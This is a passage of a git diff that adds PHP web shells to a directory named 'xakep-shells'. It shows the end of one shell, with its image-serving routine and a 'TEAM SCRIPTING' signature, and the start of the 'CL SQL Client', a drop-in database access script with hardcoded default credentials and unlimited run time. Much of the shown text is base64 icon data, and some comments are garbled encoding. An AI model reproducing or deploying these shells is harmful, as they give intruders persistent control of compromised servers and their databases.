+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7",
+"ext_xsl"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
+"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
+"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
+"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw==",
+"1"=>
+"R0lGODlhGAASAPZKAAICAgISCgI6EgJqFj6aIkyiJhqWIg6WIgJ6GkKeIk6mJgJSFgJOFAIyEgJe".
+"FjaKHkKSHkKOHgI+EiJyGjqCGjaCGj6KImKqQmauSgJGEipyFip2Gi52GgJWFgIqDjZ+HiJ+LgJW".
+"GgJKEhBQGSZuHiJuFiJqFgImDlrOQiJuGiZ2HAJaFyaCHDKSHi5+GhJmFh5iFxpiFl6iQhp6Li6O".
+"HkLCKjqqJjKCGhZuFhpaFhZaFgJeGjaqJj6yJjJ+Gi56GgJSEgJmGhZOFiJaGiZmIi52KkKKNlKe".
+"PmKySnLGUnrWWip6GjaaIjKOHgJyGgIWCgoeCgIuDgJiFh5yFhJaFg5qFgp2GgqCHgJmHgJuGiZy".
+"FiJmFiKCHiaOHg5OElqaQiqGLgJ2GipyGiZqGiJmGip+HiqOIi6WJhImFgJ+HhiCGiJ6GiJqGh5m".
+"GiJ2GiaKHgImCkKONh52GhZyFhZ2GhZ+GhaGHlaWQmKmRl6iRgIiCwIeCgIaCgI2EgAAAAAAACwA".
+"AAAAGAASAAAH/4AAAQIDBAUGAYiKiYwHjQGDCAkKBQsBlpiXmpkMAQ0ODxAREKSlpqemEhMUFa2u".
+"rhYXGLO0tRkaGxwdHhm5uR8YICELGcUZIiIMDCMkJSYnKB4lJSkqGB0iKywtLi/FycswMTELJxkw".
+"6DIzDCs0NTY3GzgZDAsdIzk5Ojr5/Rg7DFTw6OHjBwcNIoA4CDJCyBAiRYwcQZJECYYVC5YwafLD".
+"4AaFA5yMeALlRBQJIjpIGfBvxZQbBTds0EClipUrIwJE0RnAA6QAGLBIyaKFg68tMCZw6ZLTSwAR".
+"ATL8/AImS5gJYjaIGUOGRBkzZ3L+HBsADYY0atakYNOGDBs3LEfemMm5c6dPOJDMxuEiB4ffOXTq".
+"qLHT9GnUwxLK3sGAJ4/jPHhoiSVLufJPujzvBsCLV08Az3sC8BEdoDBUqVITJ+7jqbXmQAA7",
+"2"=>
+"R0lGODlhPwASAOUDAFmwLFGkJUKQHmauSgBNEgBOEgBYFgBXFgBlGQBkGQByGgBxGgBzGgqAHQCB".
+"HQ2BHQqCHRCCHSWNHySOHyWPICePICuXJSyWJSmXJSmPICeQISaPIBaFHQAQCgAZCgAXCgAWCgAU".
+"CgASCgAlCgAhCgAfCgAbCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAPwASAAAG40CAcEgsGo/IpBIZ".
+"aDqf0Kh0Sq1OBdisdsvter9g72BMLpvP6LR6nS643/C4fE6v2+/4vH4vNxz+B35/BoSCgYWAh4SJ".
+"iIqLgYyJkokIlZaXmJmam5ydmwqgoaKjpKWmp6imEA4QrayrrbGys6+ztreuuLMPEBESv8DBwsPE".
+"xcbHwxobFhfNF8zPztHT09DN0NbZ0tbU0s7QGeHhGuLi5OXo6eYa5+ru7xkbHPP09fb3+Pn6+/ls".
+"/v8A/4kYSLCgwYMIEypcmNCDCBAPIzKcSLGiwREiSIgoIcKhQ4gQLYocKSIIADs=",
+"3"=>
+"R0lGODlhBgASAOUDAFmwLFGkJUKQHmauSmGoQz2IIDeCGwBUFwBZGiB/LjR+Hyt2GQBOEgBPFABV".
+"Fyl0HgBXFgBYFwBbFwBjGTCEMFmiQQBmFwBpFwBtGQBzGhKCIGWtSgB2GwB6HQB/HQCCHRuIHwCE".
+"HRCGHRKJHRKLHR2PICWPICSPIC2XJCyWJSmXJCmWJCmaJUOMO1iYQimPICyPIhImFB+IHySOIUGK".
+"OAAQCliXQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAABgASAAAGSkCAcBgoGgXI5GBA".
+"KBgMEERioFgwGA3I4AGRSCaUiuWCyWgGnI7nAxqERKNRaTAz2VGDFEvfcsH+MAMxMjM0gjVLNjE1".
+"jI2Oj49BADs=",
+"4"=>
+"R0lGODlhQgASANQJAFmwLFGkJUKQHjeCGyt2GSFsFx1gFhtZFIrdY4zdZIndYobdYoPdYILdX4Dd".
+"X3/dXgBvGQBuGQBwGQAQCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAA".
+"QgASAAAFlSAgjmRpnmiqrkHrvnAsz3RtC3iu73zv/8DgYEgsGo/IpHLJJDif0Kh0Sq1ar4Wsdsvt".
+"er/gsNhALpvP6LR6zW4f3vC4fE6v2+94hB6R6Pv/fnoJeguFhgiFDIqKDY2OjQ+GC3uCgJYRmJma".
+"m5ydnpgSn6KeE6Wmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsMhADs=",
+"5"=>
+"R0lGODlhIQASAPYtAFmwLBqWIAASCg2VIEugJD6YIABqFwA6EAAAAFGkJQBSFABOFE2iJE6lJUKd".
+"IgB5G0KQHkGPHTaJHQBdFgAzEDeCGzuBGiBxGQA+ECt2GQAtDQBFEi53GSpwFyFsFwAnDVrNQgAq".
+"DSFqFyVsFxBQGR5hFhtgFhtZFBdZFIDdX3/dXobdYondYozdZInaYofYYYPTXn3MW3jEV3G6UWix".
+"TF+lRVWYP0qLODx7LjNvKShhIRlYHRJQFxRKFA1GEgBuGQBlFwBaFABUFAAzDQ0dCgoZCgoWCgAW".
+"CgAaCgAeCgAiCgAlCgA3EABKEg1OEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA".
+"AAAAIQASAAAH/4AAgoOCAQKGiIeKA4sCAAQFBgcCCAmWl5YKApqcm56dCwIJDA0OD5MQqaqrrK2u".
+"ERASExQVtba3uLm6tRYXGBnAwcLDxMMKGhscGR0bHs7P0NHS0R8gISIeIyQl3N3e3+DfCh8bJtwk".
+"J+nq6+zt7ijwJiQpKSor9yss+votLSwuL2DEkDGDRg0bN3Dk0LGDRw8fJH5InEixokQDQCYEEbJg".
+"A4YhGj4QKWJEAAkBAo6kXIlEQMuWSQQokSlgSc2bIQRo0GnypYCYM23azElBQFEmAjAkFbCBqYAm".
+"ApyYREm1qtWrWK2eXKlSpU+YNIPeHMpzJwmfQMcKIGpUAFKlSiObNoUqdWvWu3ipbu3K0qXftGKF".
+"ri3b8y9NwWyPLo3rlK7JQAA7",
+"font"=>
+"/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAACgAA/+4ADkFkb2JlAGTAAAAAAf/b".
+"AIQAFBAQGRIZJxcXJzImHyYyLiYmJiYuPjU1NTU1PkRBQUFBQUFERERERERERERERERERERERERE".
+"RERERERERERERAEVGRkgHCAmGBgmNiYgJjZENisrNkREREI1QkRERERERERERERERERERERERERE".
+"RERERERERERERERERERERERE/8AAEQgAlACUAwEiAAIRAQMRAf/EAHAAAAMBAQEAAAAAAAAAAAAA".
+"AAACAwEEBgEBAAAAAAAAAAAAAAAAAAAAABAAAQMDAwMCBQIFBAMAAAAAAQAR4iGhAjESA0FhcVEi".
+"8IGxwRPhwvFSgvIE0TJCYnKSohEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEQMRAD8A85yO+rfO".
+"SMMvTp3kjIkmvyrJPjk3WnmSCZyJLuPj+pM2QZ+veSTLlr28yVMeQkit5IMz4wA4y+P/AGUiW63k".
+"unPMnWnx/wCS5ssvT6yQU489oZ9e8kFvW8k/DmG/WSjvO7W8kDbiOr/OSMcq0+slu7veSwcvobyQ".
+"Bc6m8kbm63kjLItreSmM263kguSRi7hvMlIE7daeZLTyk47fvJZv9rPeSB+PlFHN5JuUhwxvJQxI".
+"epvJVJALfeSBcvR7yWYgkt95KmTNreSXHLIGhf5yQY3Tr5khbuL9/MkIH5eQO7v85KQzJ63ktJ9r".
+"veSUZt1vJBmRY1N5JvyBh27ySnJ6veSelK3kgtnlUg0Px3UTlVwbyVTlj0L/AB5UX73kgph7tcm+".
+"clI5B6GnmSfAEuX7ayUiWOt5IH30d7yWYZN1vJLuej3kqYgnreSBs83x1vJSf1N5J26veSXI97yQ".
+"dGO3Z8vWSRxs1r5kjEPjreSwYvjue8kExUO95LTyHqbyW8ebGpvJNzZuQxvJAm/veSrxkvreSgcj".
+"63kqcRJOtPMkGv7nfr6yQt7PeSEGZ5FyD9ZJMcvU3kqZkklzeSHp7vrJBPLIPreSCSCK3kinQ3km".
+"3gsB9ZIH5c2AANR/2/UKb97yVs8AA73ko5HveSCmPLtDfeSi7nW8lTHHdiwNX9ZKbt1f5yQGXq95".
+"KoY1fp6yU3y9byVMX13afH8yBeTJgz3ksGYNHvJGWXTL6yWBh1vJBYPtcZfJ5KR5CcWGnmSc8hAH".
+"j1kp45tT7yQbhkOpp5kmzOIIA+slmIchzeSblYEMbyQKW9byTY57TreSzIhqGvmSkSfW8kFvyV1v".
+"JCVy2tfMkIN5OYE0L/OS0ZuKG8knKQDT6yT8eQABe8kGFuv1knOeIY4mvmShnybsne8lXEilbyQY".
+"f8g5UJp5kkOXe8lbkxxxLg9fWSm/e8kG8eJy6t61ksdtDeSpxAkODr3koZ51Z9O8kGnkagN5Jxyg".
+"9byUX73kqOB1vJBQl8XBr5kpO3W8lhyOr3kmJ7695IN3ECj+XkgY+13vJWxzGxn6eslHcW1p5kg3".
+"HIir3ksy5zkdbyWDKoreSCADQv8AOSBssgRrXzJKC9HvJYToXvJNjlV3vJAbqs9fMkJfy+7W8kIN".
+"5BtLPeSMPN5Izy9TXzJbg563kgnka0N5LRmSQHvJNl7Sz3kkGTHW8kHTy4ZYiuT/ADkucEvreSuf".
+"8jeGP1kkOVdbyQU4ssgA1X7yXPmfca3kuri5RjiQTV/WS5+TJ8nBp5kgmS3W8loJPW8kwyB63kmx".
+"yGNXvJApyo33kjfUVvJWzO7HdoK/GqiD3vJAEFv1kgZ0b7yXTjyDYzjT1kpbwBrXzJACoYm8kcjY".
+"ZMDeSOM7tTTzJbyjHEit5IJ5Gmt5JsMhiam8kZZgdbySb3qDeSBt2O93p5khJ11vJCB8uQEu95IH".
+"K1B9ZIzGzrTzJKM2IL3kgw51qbyTZ9jeSCXOtPMlmWTChvJBozb+MkmRrreSbHkHU3kseut5IOr/".
+"AByAKm8lLMsSQbyWYEHreSUcrn9ZIDcDqW+ck4yx9byWbu95Jg3reSDCCQ708ySu3W8lXPNsaGnm".
+"S5xyepvJBfHEbO/mSk3td7yTa47hleSXHIka08yQHGcnobyW8m5wcjeSbHMBq3kt5Mjk3T5yQSyJ".
+"P8ZJ8GBd7yQdNbyWYgks7jzJAbxud7yQl9rs95IQPyA0BN5KenW8lXk5NzMdKayUhm9AbyQBypre".
+"Sw5uNbyWkt1vJA7m8kGP3vJG7veSYZd6eZIJrreSBRkRV7yRjlXW8lXjALv9ZJMvaTWg7yQZln0e".
+"8lozINTeSXd3vJM/w8kD5Znb+slHd3vJdBOO0jQ+ZKIHqbyQaOUtte8kwy9rPeSMdur18yT45A4d".
+"/MkGcf8AM/X1kn5+bEttN5KfQl6eZJMyKAGnmSDTyd7yW4cjn9ZJMqdbyTcZ73kg1qt18yQm/IHd".
+"7yQgzLIavr3kkNKg3km5CMdDeSXHMk63kgN/V7yTFmBB17ySZmut5IORYVvJA+BHU3kkyzrreSMM".
+"u95Jz8VkgfibIO95JMg2RreSfiJqx07yU8+Ri5NfMkAcgOt5KgzB0N5Ln3P1vJbubreSDpzwYO95".
+"KDtV7yTfnLN95LH7695IKBzj/up5kkFA73knx5iAB95JTmWp9ZIDfqH17yUn73krAghnr5kt5Msc".
+"urHzJBHcepvJNhk51vJaR3vJGPIMTreSAY7tr3khDl9z18yQgzIsKm8kmJcs95J+XMZMxvJLiSC7".
+"3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB".
+"B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn".
+"5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO".
+"MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U".
+"hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc".
+"/wDchCA97/3IQhB//9k=",
+"pdisk"=>
+"R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK".
+"yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX".
+"V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O".
+"jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp".
+"qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N".
+"Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C".
+"BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF".
+"IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7",
+"odel"=>
+"R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq".
+"SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs="
+
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "<center>";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+echo $u.":<img src=\"".$sul."act=img&img=".$u."\" border=\"1\"><br>";
+  }
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $d�ta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+
+?>
+<? // [CT] TEAM SCRIPTING - RODNOC ?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/cyberlords_sql.php.php.txt b/xakep-shells/PHP/cyberlords_sql.php.php.txt
new file mode 100644
index 0000000..f3a39b6
--- /dev/null
+++ b/xakep-shells/PHP/cyberlords_sql.php.php.txt
@@ -0,0 +1,1722 @@
+<?php
+/*
+/********************************************************************************
+/*
+/*  CL SQL Client - ����������� SQL-�������� �� ���������� phpmyadmin ��������.
+/*
+/*  �� ������ ��������� ������� ��������� ������ �� �������� ��������� �������� (cyberlords.net):
+/*
+/*  ~~~~~~~~~~~~~~~~
+/*  [!] Important
+/*  [+] New
+/*  [-] Fixed error
+/*  [*] Changes
+/*  ~~~~~~~~~~~~~~~~
+/*
+/*  Library features:
+/*   ~ ��������������� ��������
+/*   ~ ����������� ����������� � �� ����� Unix Socket
+/*   ~ ��������, �������������� ���� ��������� ��� ��� ��������, �������� ����� ���.
+/*   ~ ��������, ��������������, �������� ����� ������ �� ������������� ����������.
+/*   ~ �������������� ��������� ����� ������, �������� �������, ���������� ������� � �������, �������������� ������.
+/*   ~ ���������� ������������� ������� � �� � ��������.
+/*   ~ ����� ��� � ������, � ������������ �������� �� HTTP ��� ������ ������ ����� � ��������.
+/*   ~ �������� ������.
+/*
+/*  Date started: 26.09.2005
+/*
+/*  Coded by n0 [nZer0]
+/*  Copyright (C) n0 2002-2005
+/*  www.cyberlords.net
+/*
+/*  Last modify: 10.01.2006 v.1.0 pre-release build #7
+/*
+/*  At least some greetz fly to: Peng(0), k0pa, Satyr =)
+/*
+/********************************************************************************
+*/
+
+//-----------------------------------------------
+// USER CONFIGURABLE ELEMENTS
+//-----------------------------------------------
+
+// Script self [!]
+$baseurl  = $_SERVER["PHP_SELF"]."?";
+// Self Version
+$version = 'v.1.0 pre-release build #7';
+// Language [!][+]
+$language = "ru";
+// Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) [!]
+$tmpdir = "./";
+// Use unix socket? Only for MySQL
+$unix_socket = 0;
+// time limit of execution this script over server quote (seconds), 0 = unlimited.
+$timelimit = 0;
+// Authentification [+]
+$auth = 1;
+// user login
+$user = 'sql'; 
+// DON'T FORGOT ABOUT PASSWORD!!!
+$passwd = 'sql'; // user password
+// http-auth message [+]
+$login_txt = "User Authenticate :: SQL Client";
+// http-auth error message [+]
+$accessdeniedmess = "<h3>Access Forbidden</h3><BR>You must enter a valid login and password to access this resource";
+
+// OS
+$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
+if($win) {
+ $unix_socket = 0;
+}
+
+// Set php.ini sections
+ignore_user_abort(true); // ignore user abort
+ini_set( 'display_errors', true ); // display errors
+ini_set( 'html_errors', false ); // html error
+if($unix_socket && dbtype == 'mysql') {
+ ini_set( 'mysql.default_socket', "/tmp/mysql.sock" ); // [!][+]
+}
+error_reporting(E_ERROR | E_PARSE | E_WARNING); // Error reporting E_ERROR | E_PARSE | E_WARNING
+ini_set( 'output_buffering', false ); // output buffering
+set_time_limit($timelimit); // time limit
+set_magic_quotes_runtime(false); // magic quotes runtime NULL
+
+//-----------------------------------------------
+// END USER CONFIGURABLE ELEMENTS
+//-----------------------------------------------
+
+// PHP version
+$phpversion = phpversion();
+
+// Authenticate function [+]
+if (!@stristr($_SERVER["GATEWAY_INTERFACE"],"cgi") || $auth == true) {
+ if (!empty($user) && ( !isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$user || $_SERVER['PHP_AUTH_PW']!==$passwd)) {
+  header('WWW-Authenticate: Basic realm="'.$login_txt.'"');
+  header('HTTP/1.0 401 Unauthorized');
+  die( $accessdeniedmess );
+ }
+}
+
+// HEADERS [!]
+header("Content-Type: text/html; charset=windows-1251");
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+// Checking php version [!]
+if(version_compare($phpversion, '4.1.0') == -1) {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+}
+
+// Cheking PHP version
+if (str_replace('.',null,$phpversion) < 410) {
+ die("<BR>Warning! You should update PHP to 4.1.0. Current version ".$phpversion."<BR><BR>");
+}
+
+// Checking magic_quotes_gpc()
+if (@get_magic_quotes_gpc()) {
+ foreach ($_POST as $k=>$v) {
+  $_POST[$k] = stripslashes($v);
+ }
+ foreach ($_GET as $k=>$v) {
+  $_GET[$k] = stripslashes($v);
+ }
+}
+
+// Buffering start
+@ob_start();
+// Set options
+@ob_implicit_flush(0);
+// Start Session
+@session_start();
+
+// Microtime
+if (!function_exists("get_micro_time")) {
+ function get_micro_time() {
+  list($usec, $sec) = explode(" ", microtime());
+  return ((float)$usec + (float)$sec);
+ }
+}
+
+// starttime
+define("start_time",get_micro_time());
+
+// Images Array
+$images_array = array(
+"sql"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE
+dFJOU////wBAKqn0AAAAiUlEQVR42mJgZmZEAszMAAHEwMzIhAQYmQECCEMAIIBAAgwMTBAMEgAI
+IKAAkGYCc8ECAAGEIQAQQGAzGJAEAAIILsAAFQAIIJAWsB6IyYzMAAGEZC0D2FqAAMJwB0AAYQgA
+BBAD3C9AHsgvAAEEFIACRqA0EAAEEEKAmREsABBASALMYAGAAAMA5HsB3KxlNZ8AAAAASUVORK5C
+YII=
+",
+"log_in_off"=>
+"R0lGODlhFgAWAOYAAAAAAP////7+7////f///vfzbffzbvfzc/j0dvj0fvn1ivr3nPv4p/v5tfv
+5tv382/PtbPXvh/bxmvfzsf370fn32v375P/62f364/377P/+9//kQP/nVf/nVv/qbf/uhf/uhv/
+xoP/1vP/2wP/62/rVLO7ZaPfuwv366/raSvreaP3zzdfBd/756OrEXtO8fPLZlv/++8+2eMuwdeW
+mKuzRm9TQyMywe+CaKsyxg/Ls4u7l2OWvZ+bYxffy7Prz7Pnu5OW3nseNbsqPc82nlsuMcsudisR
+xVOCqlcpwVM2nmr9XO8V6ZcV+a7xHKMN5ZsV8acZ9a8V8a7+AcMqRgsqXi+W6r82nnsymnbxSOrx
+SPMJxYMJ0Y8V8bLY8KLlKNbxSP8V8brlKObhIObtTQrtTRb5fUsp0aMFxZceKgcqln7lJO8Fzab9
+5cMyMhMWHgMeRirtUSsFza7txa8qZlLtTTMN7d7ExLLtUUcFzcMN7eL15drtUUrxVU8BgX////yH
+5BAEAADYALAAAAAAWABYAAAfPgDaCg4SFhoeIiYpVaExbT0aKhXJBLQEjKThekoJ5QDErbVMuGyV
+OklhWBCRUgkIdGzRHimwoAhpvgkMeHBtZil0BFA8/e3MwILxailABDQ4PGhciIR8qYMwBDAvQ0tQ
+8UYlERQESCtzR00lqiERSFj0sCefdSHXtUhg9LyYI8ws1zvDBh2GHDANLyJARs8YMHERKwljQMQN
+CgTGcbFxxk4EihC9kmmS0E0PHjQgHyGQUZMdHjgl3ynBZaUPPgAon4tAURMdPHzxpdgodiigQADs=
+",
+"info"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs
+/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv
+/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3
+/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr
+/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX
+pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA
+dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW
+9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK
+4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm
+C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg
+2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF
+CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA
+Ow==",
+"browse_db"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAPUExURZmZzAAAAP///2ZmZgAAANTzOHcA
+AAAFdFJOU/////8A+7YOUwAAAG9JREFUeNpiYEEDAAHEwMKMAlgAAggowMDAAMJgwMwCEEAYAgAB
+hKEFIICAAkxMTCAMBswsAAEEEmAECjCCAVAAIIAwVAAEEIYKgADCUAEQQBgqAAIIQwVAAGGoAAgg
+DBUAAYThUoAAYkD3PkCAAQBJdwJ8aqfwRgAAAABJRU5ErkJggg==
+",
+"browse_tbl"=>
+"iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAMAAAC67D+PAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAJUExURZmZzP///wAAAC6CLTEAAABCSURB
+VHjaYmCCA4AAYmBigAImgABCYgIEEANCAUAAMTAxQgETQAABmRAxRiaAAEISBQggJFGAAEISBQgg
+JBMAAgwAHDAAjTfpsEkAAAAASUVORK5CYII=
+",
+"host"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAVUExURf8AAMbGxoSEhJmZzP///wAAAAAA
+AM12SjgAAAAHdFJOU////////wAaSwNGAAAAmklEQVR42mJgQwMAAcQAZzGBABsbQAAxsDGDARMT
+IxAwsbIBBBBcgAUImIACAAHEwMYKYrJCFbCyAQQQXAAEWIEqAAIIJADRBNUCEEBAAVaIAFQLQACB
+rIVrAmkBCCCQLRABqBaAAEIIgLQABQACCGQoKxgwMoAFAAIIzR1sbAABBBNgA6sC2gAQQAwQFivc
+jwABxIDufYAAAwArFQQ55WWX3AAAAABJRU5ErkJggg==
+",
+"deltbl"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAkUExURZlmZv+ZM/9mAEBAQLOz2cwzM8wA
+AP8AAJkAAP///4yMjAAAAL6JDcIAAAAMdFJOU///////////////ABLfzs4AAAC2SURBVHjaYuBG
